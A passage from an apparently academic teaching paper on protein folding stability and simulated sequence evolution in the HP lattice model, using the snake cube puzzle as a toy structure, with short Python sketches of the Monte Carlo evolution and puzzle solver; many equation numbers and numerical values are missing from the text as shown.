where $\langle C_{ij}\rangle$ denotes the average value of the contact between residues $i$ and $j$ in the misfolded ensemble, and we adopt the approximation that all such average contacts are equal and that the average number of contacts of misfolded structures equals the number of contacts of the native structure, $\sum_{i<j}\langle C_{ij}\rangle=N_c$. in real polymers, $\langle C_{ij}\rangle$ decreases with the sequence separation $|i-j|$ between the two residues in contact, as predicted by polymer physics and as can be verified through a statistical analysis of the pdb, but we neglect this dependence for simplicity. next, we combine the misfolded and unfolded states into a single non-native state containing both states separated by an energy barrier, which we describe with the partition function $Z_{\mathrm{nonat}}=e^{-\beta G_{\mathrm{misf}}}+e^{-\beta G_{\mathrm{unf}}}$, where $\beta=1/k_B T$ is the inverse temperature. we define the folding free energy $\Delta G$ as the difference between the native and non-native free energies,

$$\Delta G(A)=G_{\mathrm{nat}}+k_B T\log(Z_{\mathrm{nonat}}). \qquad ( )$$

finally, we assume that the free energy of the misfolded ensemble is much more negative than that of the unfolded ensemble, which will be neglected. thus, we estimate the folding free energy as

$$\Delta G(A)=\sum_{i<j}C^{\mathrm{nat}}_{ij}U(a_i,a_j)-\frac{2N_c}{l(l-1)}\sum_{i<j}U(a_i,a_j). \qquad ( )$$

we will adopt the above free energy in the model of protein evolution described in the next section. in the context of evolution, we call positive design the selective forces that make the first term of the above equation more negative, increasing the stability of the native state relative to the unfolded state, and negative design (berezovsky, zeldovich & shakhnovich, ; noivirt-brik, horovitz & unger, ) the selective forces that make the second term of the above equation more positive, decreasing the stability of the misfolded ensemble (which, it is important to note, is independent of the native state). protein evolution pursues both positive and negative design at the same time. however, positive and negative design may have contrasting requirements.
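a minimal sketch of eq. ( ), separating the native (positive design) term from the rem estimate of the misfolded (negative design) term; the hp interaction values are the same assumed ones used in the designability sketch above, and the function name is illustrative.

```python
# sketch: folding free energy = native contact energy - rem misfolding term.
import numpy as np

U = {('H', 'H'): -2.3, ('H', 'P'): -1.0,
     ('P', 'H'): -1.0, ('P', 'P'): 0.0}          # assumed li et al.-style values

def folding_free_energy(c_nat, seq):
    c_nat = np.asarray(c_nat)
    l = len(seq)
    pairs = [(i, j) for i in range(l) for j in range(i + 1, l)]
    g_nat = sum(U[(seq[i], seq[j])] for i, j in pairs if c_nat[i, j])  # native term
    n_c = sum(int(c_nat[i, j]) for i, j in pairs)                      # native contacts
    sum_u = sum(U[(seq[i], seq[j])] for i, j in pairs)
    g_misf = 2.0 * n_c * sum_u / (l * (l - 1))                         # rem estimate
    return g_nat - g_misf
```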
hydrophobicity is recognized as the main force underlying protein folding. increasing hydrophobicity favours positive design, since the native energy becomes more negative, but it contrasts negative design, since the free energy of the misfolded ensemble becomes more negative as well (and at a faster pace than the native energy, since the rem free energy has a term proportional to the mean square energy of alternative conformations). evolution has to finely balance these two selective forces, and the balance depends on the mutation bias, i.e., on whether mutations favour hydrophobic or polar amino acids (méndez et al., ). we will illustrate these issues and their interplay with other evolutionary forces, such as mutation bias and population size, with the computational exercise proposed in the next section.

structurally constrained sequence evolution
the main point we address here is that the thermodynamic properties of folding observed in natural proteins are a consequence of the evolutionary process, consisting of mutation and selection. with the aim to "bring molecules back into molecular evolution" (wilke, ), we will show how protein evolution is jointly constrained by evolutionary parameters (mutation bias, population size, temperature) and by the requirement to fold into the target native structure. from a didactic point of view, protein evolution offers a valuable opportunity to illustrate the essence of statistical mechanics in a way that is intuitive for biologists. the evolutionary model described here can be interpreted as a statistical mechanical model in the space of protein sequences, constrained by the requirement of stability of the native state. our evolutionary model considers a genetically homogeneous population, i.e., we assume that the mutation rate is very small. it is important to distinguish between a mutation, which is a microscopic event that affects individuals, and a mutation that becomes fixed in the population (often called a substitution, although this term should only be used for amino acid or nucleotide changes and not for insertions and deletions), which is the macroscopic event that interests us here. every time a mutation occurs in a sequence $A$, it may either disappear or become fixed in the population with a probability $P_{\mathrm{fix}}$ that depends on its fitness relative to the wild type and on the population size $N$,

$$P_{\mathrm{fix}}(A\to A')=\frac{\big(f(A)/f(A')\big)-1}{\big(f(A)/f(A')\big)^{N}-1}, \qquad ( )$$

where $A'$ is the mutant sequence. it is often assumed that the fitness depends on the stability of the native state and is proportional to the fraction of proteins that are folded at thermodynamic equilibrium (goldstein, ; serohijos & shakhnovich, ),

$$f(A)=\frac{e^{-\beta\,\Delta G(A)}}{1+e^{-\beta\,\Delta G(A)}}, \qquad ( )$$

where $\Delta G(A)$ is modelled for instance as in eq. ( ) and $\beta=1/k_B T$ is the inverse of the temperature. although other properties (in particular the dynamics of the protein, its capacity to interact with other proteins, its catalytic rate, and so on) are arguably more important than its stability, they are more difficult to model, and stability is a necessary prerequisite at least for the large number of proteins that must be folded in order to function (i.e., excluding natively unfolded proteins). if a mutation is disadvantageous, i.e., $f(A')<f(A)$, corresponding to a lower stability, the probability that it becomes fixed decreases exponentially with population size, but it is non-zero if $\log f(A)-\log f(A')$ is of the order of $1/N$. in other words, the smaller the population, the more tolerant it is to mutations that decrease the fitness. analogously, a thermodynamic system is more tolerant to changes that increase its energy the higher its temperature. this analogy can be made more meaningful if we consider the evolutionary trajectory as a random walk in the space of possible sequences (sella & hirsh, ). more precisely, it is a markov process, since the probability of jumping to sequence $A'$ at time $t+1$ only depends on the sequence visited by the population at the previous time $t$.
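eqs. ( ) and ( ) translate directly into code; the sketch below also makes explicit the neutral limit $1/N$ discussed later. the function names and the numerically stable logistic form of the fitness are illustrative choices.

```python
# sketch: fitness (fraction folded) and fixation probability of a mutant.
import math

def fitness(delta_g, beta=1.0):
    """fraction of folded molecules; equal to exp(-b*dg)/(1 + exp(-b*dg)),
    written here in the equivalent, numerically stable form 1/(1 + exp(b*dg))."""
    return 1.0 / (1.0 + math.exp(beta * delta_g))

def fixation_probability(f_wild, f_mutant, n_pop):
    """probability that a mutant with fitness f_mutant replaces the wild type
    in a homogeneous population of size n_pop; neutral limit is 1/n_pop."""
    if math.isclose(f_wild, f_mutant):
        return 1.0 / n_pop
    x = f_wild / f_mutant
    return (x - 1.0) / (x ** n_pop - 1.0)
```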
in our opinion, the image of a homogeneous population jumping in the space of possible genotypes through random mutations, subject to an acceptance probability that depends on fitness differences and on population size, makes the abstract concept of a markov process more intuitive. a remarkable property of markov processes is that, under not very restrictive mathematical conditions, after a large enough time they converge to a limit distribution over their phase space. this limit distribution is easy to compute if the markov process has a mathematical property called detailed balance (or reversibility, in the molecular evolution literature), which is the basis of the utility of markov processes in statistical mechanics. in fact, the boltzmann distribution in conformation space, which can be expressed mathematically as $P(C)=\frac{1}{Z}\exp(-\beta E(C))$, where $E(C)$ is the energy of the conformation $C$ and $Z$ the partition function, cannot be computed analytically, given the impossibility of computing the partition function when the system is high dimensional. the monte carlo method consists in simulating a markov process that fulfils detailed balance such that its limit distribution coincides with the boltzmann distribution, so that averages over the boltzmann distribution can be substituted by averages over the markov process. this situation has a parallel in molecular evolution. in this case, our starting point is the transition probability of the markov process (in the limit of a homogeneous population), from which we can easily compute the limit distribution in sequence space by exploiting detailed balance. sella & hirsh ( ) noted that this limit distribution has the form $P(A)=\frac{1}{Z}\,e^{N\log f(A)}$, i.e., sequences with higher fitness are visited more often during the course of evolution, as we expect, and the prevalence of sequences with large fitness is modulated by a factor that depends on population size. strikingly, there is a strong formal analogy between this limit distribution in sequence space and the boltzmann distribution in structure space. firstly, there is a correspondence between fitness and minus the energy: sequences with larger fitness are visited more often, in analogy with structures with lower energy, which are observed more often. secondly, there is an interesting correspondence between the effective population size and the inverse of the temperature, implying that small populations are more tolerant to sequences with low fitness in the same way in which systems with high temperature are more tolerant to structures with high energy. we think that this analogy can help biologists build an intuitive understanding of the basis of statistical mechanics, and can transmit key evolutionary concepts to physicists. this introduction motivates the following exercise, which consists in simulating the evolution of a homogeneous population of size $N$, subject to random mutations with a given bias and to selection on protein stability. as target native structure, we choose one of the solutions of the snake cube. the random process that we simulate consists of four steps:

1. mutation. one of the positions of the sequence is randomly chosen and mutated from h to p or vice versa. we allow the rates of mutation from h to p and from p to h to be different.
this bias is parametrized by a parameter $p$: the rate at which an amino acid of type h mutates to p is proportional to $p$, and the rate at which a p mutates to h is proportional to $1-p$ (this parameter suffices, since the total mutation rate only affects the time scale of the problem). we extract the mutant site in two steps. firstly, we extract a random number to decide whether the mutation is from h to p (with probability $P_{hp}=p\,n_H/\big(p\,n_H+(1-p)\,n_P\big)$, where $n_H$ is the number of positions occupied by an h and $n_P$ the number occupied by a p) or vice versa. then, we extract with uniform probability one of the $n_H$ sites if the mutation is from h to p, or one of the $n_P$ sites otherwise.

2. fitness evaluation. we compute the folding free energy of the mutated sequence at temperature $T$ with eq. ( ); the computation can be accelerated by noting that only the terms involving the mutated residue change. the fitness is then evaluated with eq. ( ).

3. selection. we compute the fixation probability, eq. ( ), and we extract a random number to decide whether the mutated sequence gets fixed or is eliminated.

4. sampling. finally, we take statistics of the relevant quantities (fitness, $\Delta G$). if the mutation is accepted we use the new sequence, otherwise we use the previous wild-type sequence. it is of course important to remember to update the counts even if the sequence does not change.

starting from a random sequence, stability and fitness tend to increase on average, although with large fluctuations. we are interested in the stationary properties at large times, when the limit distribution is reached and the memory of the starting random sequence is lost. we propose the following method to numerically estimate the stationary value of the fitness. we define the average fitness at time $t$ as

$$\overline{f}(t)=\frac{1}{t}\sum_{k=1}^{t}f\big(A(k)\big). \qquad ( )$$

we now assume that the average fitness tends to its stationary value exponentially,

$$\overline{f}(t)\approx \overline{f}(0)+\big(f_{\infty}-\overline{f}(0)\big)\left(1-e^{-t/\tau}\right). \qquad ( )$$

this assumption allows us to derive the parameters in which we are interested, $f_{\infty}$ (the stationary fitness) and $\tau$ (the time scale), through the linear fit of $y=\overline{f}(t+1)-\overline{f}(0)$ versus $x=\overline{f}(t)-\overline{f}(0)$:

$$\overline{f}(t+1)-\overline{f}(0)=\big(\overline{f}(t)-\overline{f}(0)\big)\,e^{-1/\tau}+\big(f_{\infty}-\overline{f}(0)\big)\big(1-e^{-1/\tau}\big). \qquad ( )$$

the slope of the fit gives $\tau$ and the intercept gives $f_{\infty}$. this computation allows us to discuss the advantages of analytical methods, such as the linear fit, with respect to the alternatives. an alternative method for computing $f_{\infty}$ consists in discarding the first steps of the simulation and using only the last steps to compute the average; however, it is difficult to be sure that the transient we discard is long enough to guarantee convergence but not so long that it reduces the statistics, and, moreover, we would miss the interesting information on the time scale $\tau$. a second possibility is to perform a nonlinear fit of eq. ( ); however, nonlinear fits require a heuristic optimization that does not guarantee convergence to the optimal parameters. the linear fit allows an analytic solution, which is preferable, in particular for complex fits involving many parameters. a minimal computational sketch of the simulation loop and of this linear fit is given below. armed with these tools, we investigate the dependence of fitness (hence, stability) on the properties of the evolving population: the physical temperature $T$ at which evolution takes place, the population size $N$ and the mutation bias $p$. we will finally test the influence of the native structure.
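the sketch below implements the four-step loop and the linear fit described above, reusing the folding_free_energy(), fitness() and fixation_probability() functions from the previous sketches; the random seed and function names are illustrative assumptions.

```python
# sketch: structurally constrained sequence evolution and stationary-fitness fit.
import numpy as np

rng = np.random.default_rng(1)

def evolve(c_nat, length, n_pop, beta, p_bias, n_steps):
    seq = list(rng.choice(['H', 'P'], size=length))
    f_wild = fitness(folding_free_energy(c_nat, seq), beta)
    trace = []
    for _ in range(n_steps):
        # 1. mutation: choose h->p or p->h according to the bias, then a site
        n_h = seq.count('H')
        denom = p_bias * n_h + (1 - p_bias) * (length - n_h) + 1e-12  # guard
        old, new = ('H', 'P') if rng.random() < p_bias * n_h / denom else ('P', 'H')
        sites = [i for i, a in enumerate(seq) if a == old]
        if not sites:
            trace.append(f_wild)
            continue
        mutant = seq.copy()
        mutant[int(rng.choice(sites))] = new
        # 2. fitness evaluation
        f_mut = fitness(folding_free_energy(c_nat, mutant), beta)
        # 3. selection: accept with the fixation probability
        if rng.random() < fixation_probability(f_wild, f_mut, n_pop):
            seq, f_wild = mutant, f_mut
        # 4. sampling (the counts are updated even when the mutation is rejected)
        trace.append(f_wild)
    return np.array(trace)

def fit_stationary(trace):
    """linear fit of f_bar(t+1)-f_bar(0) versus f_bar(t)-f_bar(0);
    the same relation holds for any constant reference value."""
    f_bar = np.cumsum(trace) / np.arange(1, len(trace) + 1)
    y, x = f_bar[1:] - f_bar[0], f_bar[:-1] - f_bar[0]
    slope, intercept = np.polyfit(x, y, 1)          # assumes 0 < slope < 1
    tau = -1.0 / np.log(slope)
    f_inf = intercept / (1.0 - slope) + f_bar[0]
    return f_inf, tau
```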
temperature
figure shows some typical simulations reaching a stationary value under the proposed evolutionary model. each step represents one fixed mutation.

figure: average fitness versus the number of fixed mutations. each curve represents an evolutionary trajectory for a given population size.

the first evolutionary simulation that we propose has the objective of studying the effect of temperature, which enters the definition of fitness, eq. ( ), through the factor $\beta=1/k_B T$. in fig. we compare results obtained at three different temperatures and, for the sake of comparison, we also show results for random sequences. simulations were made with a fixed population size; we will analyse the effect of modifying the population size in the next section. when $T$ is low, the fitness function eq. ( ) tends to a binary function of stability: $f\approx 1$ if $\Delta G<0$ and $f\approx 0$ otherwise. this corresponds to a neutral fitness landscape in which all proteins that are sufficiently stable are selectively equivalent and all proteins that are unstable are strongly rejected. even random sequences show a bimodal fitness distribution with peaks at $f=0$ and $f=1$, as expected for an almost neutral fitness landscape, and fitness close to one can be achieved even by random sequences. for evolved sequences the most likely value of $\Delta G$ is only slightly below zero, where the fitness is close to one and the entropy in sequence space is large (taverna & goldstein, ). if $T$ increases, the fitness becomes a smooth function of stability and it is more difficult to accept mutations that decrease stability; as a consequence, the mean value of $\Delta G$ is significantly lower than in the low-temperature, nearly neutral case. at the same temperature, random sequences have free energies that are on average zero and, correspondingly, fitness distributed around $f=0.5$, which is the value attained when $\Delta G=0$. from this point of view, the inverse of the physical temperature, $1/T$, can be regarded as an evolutionary temperature: the larger $1/T$, the more tolerant evolution is with respect to mutations that decrease protein stability.

figure: comparison of the distributions of fitness (a-c) and free energy (d-f) for randomly drawn and evolved sequences at three temperatures. at the lowest temperature we obtain a neutral landscape, and the variation of free energy produced by the evolutionary process is smaller than at the intermediate temperature; at the highest temperature all sequences have almost the same fitness, and evolution becomes an almost random process.

in the high-temperature limit, all sequences have nearly the same fitness $f\approx 0.5$, independent of $\Delta G$, and evolution becomes an almost random process. indeed, it is difficult to obtain higher fitness values for evolving sequences, and the mean value of the free energy of evolved sequences, although still negative, approaches zero.

neutrality
an important consequence of the functional form of the fixation probability, eq. ( ), is that the closer $f$ is to the neutral regime in which fitness is a step function of stability, the less the evolutionary process depends on population size.
in particular, as we have seen above, for low temperature protein stability approaches the neutral threshold (taverna & goldstein, ), while in a non-neutral regime the equilibrium stability strongly increases with population size. for neutral evolution the substitution rate, i.e., the rate at which mutations become fixed in the population, is independent of $N$. in fact, if $\mu$ denotes the mutation rate and $x$ denotes the probability that mutations are neutral, there will be on average $N\mu x$ neutral mutations arising in the population per unit time. by eq. ( ), when the fitness of the wild type and the mutant are equal the probability of fixation tends to $1/N$, so the average number of fixations per unit time tends to the neutral mutation rate $\mu x$, independent of population size, as predicted by kimura's neutral model (kimura, ).

population size
the next exercise proposes to study the effect of the effective population size $N$. this may be a good opportunity to discuss the concept, explaining that the effective population size is not just the number of individuals in the population but a number that recapitulates its demographic history, in particular bottlenecks. we plot in fig. a the mean value of the free energy in the stationary state (see supplementary methods). when the temperature is low, the outcome of the evolutionary process is almost independent of the population size $N$, a hallmark of neutral evolution. when $T$ increases and the fitness is a smooth function of stability, the outcome of evolution strongly depends on population size, in the sense that the equilibrium stability markedly increases with population size. finally, for high temperature, evolved sequences have almost identical properties to those of random sequences, except for very large population sizes. we show in fig. b the effect of changing temperature for fixed population sizes. as shown in the previous section for a fixed population size, a non-neutral regime is observed at intermediate temperatures; this effect is more pronounced for larger population sizes, and the free energy reaches a minimum at an intermediate value of $\beta$ for most values of $N$.

figure: average free energies of evolved sequences. (a) versus population size for different temperatures ($\beta=1/k_B T$). (b) versus temperature for different population sizes.

we conclude this exercise by showing in table the equilibrium values of fitness and stability obtained for different population sizes, keeping all the other parameters fixed, within a non-neutral temperature regime. we chose this temperature in such a way that the free energy values are clearly distinguishable between any pair of population sizes (see fig. ).

table: average and standard deviation of the fitted parameters ($f_{\infty}$, $\tau$) and of the free energy $\Delta G$ for four population sizes, obtained in independent evolutionary processes with balanced mutations and a fixed inverse temperature.

we can see that smaller populations attain significantly smaller equilibrium fitness, since the fixation probability of disadvantageous mutations is larger for smaller populations, in agreement with the statistical mechanical analogy (sella & hirsh, ).
moreover, larger populations also attain significantly larger stability, which shows that the system is far from the neutral regime in which fitness is a stepwise function of stability. for these simulations we observe an exponential approach to the stationary state and, therefore, we can compute the characteristic time $\tau$ through the linear fit explained above. nevertheless, the differences in time scale between the different populations, although systematic, are not significant. in fact, $\tau$ depends on the initial value of the fitness, which is a strongly fluctuating variable, so that a very large number of independent simulations would be necessary to reduce the variability and improve the significance.

mutation bias
finally, we propose to explore the role of the mutation bias $p$ (see materials and methods). we perform these simulations for a small population size and high temperature, since $p$ is expected to have a more relevant impact for small populations and non-neutral fitness landscapes. table displays results for three values of the mutation bias, corresponding to hydrophobic, neutral and polar sequences, respectively.

table: averages and standard deviations of the fitted parameters and of the free energy obtained in independent evolutionary simulations with fixed population size and inverse temperature, using structure s as target; different mutation biases are represented.

we see that the equilibrium values of the free energy $\Delta G$ display a significant change. as shown in table , the stability against unfolding (i.e., the free energy of the native state) decreases when the mutation bias favours polar sequences, and the stability against misfolding (i.e., the free energy of misfolded conformations) shows the opposite behaviour. these data also suggest that the folding free energy, which results from both unfolding and misfolding, is minimum when the mutation bias is close to the value $p=0.5$ at which polar and hydrophobic mutations balance, at least for the chosen parameters (see the quadratic fit in fig. , which has illustrative purposes only).

figure: dependence of the free energy on the mutation bias. a quadratic fit is shown for illustrative purposes only.

the study of the mutation bias raises two important points, from the perspectives of physics and of evolution. from the point of view of physics, it allows us to note an important difference between the monte carlo process used to simulate the boltzmann distribution in statistical physics and the evolutionary process. while in the case of statistical physics the equilibrium distribution does not depend on which mutations are proposed, and it always coincides with the boltzmann distribution by construction, in evolution the limit distribution does depend on the mutation process, and even key properties such as the equilibrium fitness and the stability of proteins are influenced by the mutation bias, as shown in méndez et al. ( ). this fact reflects an important difference between the equilibrium distribution in the phase space of statistical physics, i.e., the boltzmann distribution, and the equilibrium distribution in the space of evolving protein sequences.
while the boltzmann distribution can be defined as the probability distribution with maximum entropy given a constraint on the average energy, the equilibrium distribution in sequence space can be defined as the distribution with minimum kullback-leibler divergence from the distribution that would be attained by mutation alone, given the constraint on average fitness (arenas, sánchez-cobos & bastolla, ). the correspondence between the two definitions can be appreciated by noting that maximizing the entropy is equivalent to minimizing the kullback-leibler divergence from the equiprobable distribution, i.e., in the case of statistical physics the reference distribution is the equiprobable distribution, while in the case of evolution the reference distribution is the one that would be attained by mutation alone. from the point of view of evolution, the fact that the equilibrium fitness depends on the mutation process creates the possibility of an interesting feedback between selection and mutation, since the mutation process in turn depends on the replicative machinery of the organism and is under genetic control. in other words, mutation and selection should not be considered as completely independent processes; rather, there is the possibility that a population selects the mutation process that is more convenient to it under its ecological and evolutionary circumstances (méndez et al., ).

structural effects
finally, we explore the influence of the target structure on the evolutionary process by comparing the least designable structure s and the most designable structure s (see table ). the structure s reaches a higher free energy on average, but with a much smaller value of the time scale $\tau$, which indicates that it reaches equilibrium faster, consistent with the fact that there are more sequences for which this structure is lower in energy.

table: averages and standard deviations of the fitted parameters and free energies obtained in independent evolutionary simulations using a high-designability and a low-designability solution as target structures, with fixed population size and inverse temperature. see 'materials and methods' for further details.

sequence-structure relationship
we conclude our analysis by relating the statistical properties of the evolved sequences to their corresponding structures. this is particularly simple in the hp model, in which each position along the sequence can be characterized by a single parameter, the frequency at which the position is occupied by a hydrophobic residue in the given ensemble of sequences. for real proteins, each position must be characterized by a vector of the frequencies of the different amino acid types (one of which is fixed by the normalization condition), called a profile in the bioinformatics literature. we plot in fig. the hydrophobicity profiles of random sequences and of sequences evolved to fold into structure s (see materials and methods for further details). the profiles of random sequences depend only on the mutation bias and, by definition, they do not differ significantly from one position to another. in contrast, we observe marked differences between positions in the profiles of evolved sequences. to rationalize these differences, we also report in fig. the number of contacts at each position of the target structure.
the predictive correlation between this structural profile and the sequence profile is readily apparent, and it implies that in this model the number of contacts determines the hydrophobicity profile of each position (bastolla et al., ). since positions with many contacts are buried in the interior of the native structure, the model recovers the well-known property of real proteins that buried positions tend to be hydrophobic and surface positions tend to be polar, and it shows that this tendency is sufficient to completely determine the hydrophobicity profile in the simple case of the hp model.

figure: sequence and structure profiles. (a) number of contacts at each position of structure s . (b) frequency of hydrophobic residues at each position for random sequences and for sequences evolved to fold into s . the number of contacts is a reliable predictor of the frequency of hydrophobic residues in evolved sequences, consistent with the common observation that deeply buried positions, which have a larger number of contacts, tend to be more hydrophobic.

it can be interesting to suggest further readings showing that the contact energy model of eq. ( ), together with a statistical mechanics approach, allows one to analytically predict the observed correlation between the number of contacts and the hydrophobicity profile (porto et al., ; arenas, sánchez-cobos & bastolla, ). this point can be proposed as an exercise, and it can be an interesting way to introduce the boltzmann distribution in statistical physics and to deepen the analogy between statistical mechanics and evolution. one consequence of the structural propensities discussed above is that the positions of evolved sequences are more conserved than positions in the random ensemble. we can quantify this through the sequence entropy of each position $i$, defined as $s_i=-\sum_a p_i(a)\ln p_i(a)$, where $a$ denotes one of the two amino acid types and $p_i(a)$ is the profile at position $i$. the sequence entropy is smaller for evolved than for random sequences. this reduction of entropy is the consequence of the constraints that enforce the stability of the native structure.
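a minimal sketch of the per-position hydrophobicity profile and of the sequence entropy $s_i$ defined above, for an ensemble of hp sequences (for instance, those sampled in the stationary regime of the evolutionary simulation); the names are illustrative.

```python
# sketch: hydrophobicity profile and per-position sequence entropy.
import numpy as np

def hydrophobic_profile(sequences):
    """frequency of h at each position over the ensemble of sequences."""
    arr = np.array([list(s) for s in sequences])
    return np.mean(arr == 'H', axis=0)

def sequence_entropy(sequences):
    """s_i = -sum_a p_i(a) ln p_i(a) for the two amino acid types h and p."""
    p_h = hydrophobic_profile(sequences)
    p = np.clip(np.stack([p_h, 1.0 - p_h]), 1e-12, 1.0)   # avoid log(0)
    return -np.sum(p * np.log(p), axis=0)
```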
final remarks
in this paper we presented a teaching unit dedicated to the computational study of protein structure, stability and evolution. this area of research is difficult to present to students, since it requires a highly multidisciplinary background that includes statistical mechanics, evolution and computational skills. our experience teaching this subject to students of the master's program in biophysics of the universidad autónoma de madrid (spain) has shown us that these concepts are easier to present using as a toy model a real toy such as the snake puzzle. this allowed us to make abstract concepts more concrete, and it opened several avenues towards more advanced subjects of evolutionary and structural bioinformatics. we have selected exercises that, in our opinion, establish simple parallels with interesting and accessible publications that we suggest to the students for further reading. we want to remark that these exercises are not intended to replace other educational tasks that deal with real biological entities; rather, we believe that the proposed approach helps students establish a fundamental theoretical framework through a computationally and conceptually tractable model. ultimately, these exercises are meant to provide a foundation upon which students can build increasingly complex biophysical models and design strategies to tackle real biological problems. in our teaching experience, we have realized that students who lack a background in physics face, in general, the most difficult conceptual challenges. for these students, the evolutionary model that we propose may constitute an intuitive introduction to statistical mechanics concepts, and the proposed simulations constitute a practical introduction to scientific computation; in general, we find that such students quickly build an intuition about the problem. on the other hand, students with a background in physics usually enjoy this new application of statistical mechanics, but they tend to have severe difficulties interpreting the results from a biological point of view. in our experience, a fruitful way to take advantage of these differences consists in forming working teams of students with different backgrounds. in summary, the increasingly interdisciplinary setting of scientific research requires efforts to overcome traditional boundaries between established academic disciplines, and these efforts are yielding promising results through the application of interesting alternatives (searls, ). a suitable scientific academic curriculum should also be evaluated by assessing how students fare in the early stages of their scientific careers. in this regard, we believe that incorporating interdisciplinary lectures in the design of academic curricula is of key importance, not only for computational biology (fox & ouellette, ). it is our responsibility to call for these changes.

materials and methods
algorithm to solve the snake puzzle
to solve the snake puzzle, we adopted a straightforward algorithm that builds the conformations of the snake iteratively and implements an exhaustive search of all maximally compact conformations, i.e., conformations that can be fitted into a cube of the appropriate side for each chain length. the search is performed on a decision tree whose nodes correspond to spatial arrangements of the consecutive rigid fragments. from each node, there are four possible directions in which the next fragment can be placed, since two consecutive fragments cannot extend along the same axis: for example, if fragment $i$ is placed along the x axis, fragment $i+1$ can be placed only in the +/-y or +/-z directions. the first two rigid fragments are placed together at the root of the tree and define the oriented x and y axes. the third fragment can be placed in any direction perpendicular to y, i.e., +x, -x, +z and -z; the last two options are related by mirror symmetry (see also main text), which we can remove by allowing only the placement in the +z direction the first time that the z axis is visited. at each step, the algorithm tests whether the new fragment occupies positions already occupied by other fragments (self-avoidance condition) and whether the partial conformation extends outside the boundaries of the cube. if either requirement is not fulfilled, the node is discarded and the algorithm goes back to the parent node, moving in the remaining directions; otherwise, we create the node corresponding to the newly accepted conformation and proceed forward. when all four directions have been tested, the algorithm goes back to the parent node.
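a minimal sketch of this backtracking search is given below. the list of fragment lengths passed to the function is a placeholder (the actual sequence of the puzzle is available in the repository listed under 'data availability'), and, for simplicity, the sketch fixes only the first fragment, so mirror images and some rotated copies of each solution are not removed.

```python
# sketch: exhaustive depth-first search over the directions of the rigid
# fragments of the snake puzzle; fragments are given as numbers of cubes per
# straight run, with consecutive runs sharing their corner cube.
DIRS = [(1, 0, 0), (-1, 0, 0), (0, 1, 0), (0, -1, 0), (0, 0, 1), (0, 0, -1)]

def solve(fragment_lengths, side=3):
    solutions = []

    def fits(cells):
        # the partial conformation must fit in a cube of the given side
        return all(max(c[a] for c in cells) - min(c[a] for c in cells) < side
                   for a in range(3))

    def extend(cells, prev_dir, idx, dirs):
        if idx == len(fragment_lengths):
            solutions.append(dirs[:])
            return
        for d in DIRS:
            if sum(a * b for a, b in zip(d, prev_dir)) != 0:
                continue                      # consecutive fragments are perpendicular
            pos = cells[-1]
            new = [tuple(p + s * q for p, q in zip(pos, d))
                   for s in range(1, fragment_lengths[idx])]
            if any(c in cells for c in new) or not fits(cells + new):
                continue                      # self-avoidance and cube-boundary checks
            extend(cells + new, d, idx + 1, dirs + [d])

    # place the first fragment along +x to fix translations and part of the
    # rotational symmetry; remaining symmetries are not removed in this sketch
    first = [(s, 0, 0) for s in range(fragment_lengths[0])]
    extend(first, (1, 0, 0), 1, [(1, 0, 0)])
    return solutions
```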
note that the tree can be built starting with any fragment of the puzzle, in particular the initial and final fragments, but also one in between (in this case, the algorithm can start moving forward and then backward, or vice versa). we represent the final solution as an ordered string containing, for every fragment, its direction with sign, e.g., (+x, +y, -x, ..., +z). this format can be converted to explicit coordinates that can be input to the visualization software used in structural bioinformatics (see main text) to visually inspect the solutions, and it can also be used to solve the puzzle manually.

designability and energy gap
to compute the designability of each of the non-redundant solutions (we exclude s since it is very similar to s , see main text), we randomly draw m sequences of the hp model (i.e., only two amino acid types, h and p, are considered), with a fixed probability that each amino acid is p. for each sequence we compute the effective energies of the target structures using eq. ( ), with the same parameters used by li et al. ( ), and assign the sequence to the structure with the lowest energy. in this way, we compute the fraction of sequences assigned to each structure. the experiment is replicated to evaluate the statistical error, with increasing set sizes m. the average and standard error of the mean are plotted as a function of m in fig. .

structurally constrained sequence evolution
we simulate protein sequence evolution with structural constraints using the monte carlo algorithm illustrated in the main text. we extract an initial random sequence $A(0)$ and compute its free energy, eq. ( ), and its fitness, eq. ( ). at each step $t$ of the simulation we mutate a random position of the sequence with bias $p$ for polar replacement. we then compute the free energy and the fitness of the new sequence and obtain the probability of fixation $P_{\mathrm{fix}}$, eq. ( ). we then extract a random number $0\le r\le 1$ and accept the new sequence (i.e., $A(t+1)=A'$) if $r<P_{\mathrm{fix}}$; otherwise, the old sequence is kept ($A(t+1)=A(t)$). it is important to note that, when the old sequence is kept, its associated values are recorded one more time: counting the values associated with rejected mutations is needed to ensure that the distribution sampled within the stationary state is indeed a boltzmann distribution, from which we then compute the averages of the fitness and of the free energy. we perform simulations changing some key parameters: nine temperature values (see fig. ), three values of the mutation bias $p$ (the probability that a mutation is from a hydrophobic to a polar amino acid), four population sizes $N$, and two different target structures (s and s ). the combinations of parameters selected for the simulations are described in the main text. for each set of parameters, independent simulations were run until the stationary state was reached. from the recorded fitness values, the average fitness $\overline{f}$ is computed, and the stationary fitness $f_{\infty}$ and the evolutionary time scale $\tau$ are obtained through the linear fit described in the main text, eq. ( ). the average of the free energy $\Delta G$ and its standard error were computed considering a sufficiently large number of points within the stationary regime.
the values presented in the tables and figures correspond to the means of the averaged values, and the errors to the propagation of the average errors obtained from the independent runs.

acknowledgements
we acknowledge pablo mateos-gil for bringing to our attention the snake puzzle as a toy model of protein structure. we are particularly indebted to raúl guantes, coordinator of the former master on biophysics of the universidad autónoma de madrid (now master on condensed matter physics and biological systems), for his support in the development of these lectures, and to the students for their motivation and feedback.

additional information and declarations
funding
this work is supported by the marie curie training network netadis (fp , grant ) (lbr), by the comunidad de madrid (amarauto program to ub), and by the spanish ministry of economy and competitiveness (fpi grant bes- - to apg and bfu - to ub). research at the cbmso is facilitated by the fundación ramón areces. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors:
marie curie training network netadis.
comunidad de madrid.
spanish ministry of economy and competitiveness: bes- - , bfu - .
fundación ramón areces.

competing interests
ugo bastolla is an academic editor for peerj.

author contributions
• gonzalo s. nido and ludovica bachschmid-romano performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, and reviewed drafts of the paper.
• ugo bastolla conceived and designed the experiments, analyzed the data, wrote the paper, and reviewed drafts of the paper.
• alberto pascual-garcía conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, and reviewed drafts of the paper.
